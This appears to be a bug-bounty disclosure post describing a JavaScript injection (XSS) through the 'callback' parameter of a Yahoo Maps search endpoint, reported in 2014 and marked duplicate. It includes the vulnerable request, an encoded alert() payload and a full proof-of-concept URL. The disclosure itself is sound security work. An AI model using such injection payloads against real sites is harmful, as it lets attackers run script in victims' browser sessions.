This bug was valid for 24 days. Later, it turned up that it’s a duplicate (#@&!).
After typing some text into the search box (i.e. “New York, NY”) and clicking the “Search Maps” button there is a GET request to gws2.maps.yahoo.com:
GET /onebox?obq=New%20York%2C%20NY&flags=JX&appid=ymapsaura2&local_count=10&userLat=52.235352&userLon=21.00939&obd=pt&obflags=D&callback=mycjson14 HTTP/1.1
“callback” parameter is vulnerable to JavaScript injection, for example by using the following payload:
alert(String.fromCharCode(34,104,116,116,112,58,47,47,108,117,98,105,46,99,122,34));
You can see the effect by visiting the following link:
http://gws2.maps.yahoo.com/onebox?obq=New%20York%2C%20NY&flags=JX&appid=ymapsaura2&local_count=10&userLat=52.235352&userLon=21.00939&obd=pt&obflags=D&callback=alert(String.fromCharCode(34,104,116,116,112,58,47,47,108,117,98,105,46,99,122,34));
This content will be then executed in maps.yahoo.com
XSS is exploitable only by visiting maps.yahoo.com and modifying the request to gws2.maps.yahoo.com (or another website, which will contain a request to that vulnerable link).
Timeline:
[February 2nd 2014] - bug was reported [March 5th 2014] - bug was marked as a duplicate
P.S. No screenshots this time, please enjoy the video:
https://www.youtube.com/watch?v=PETcfv68lM0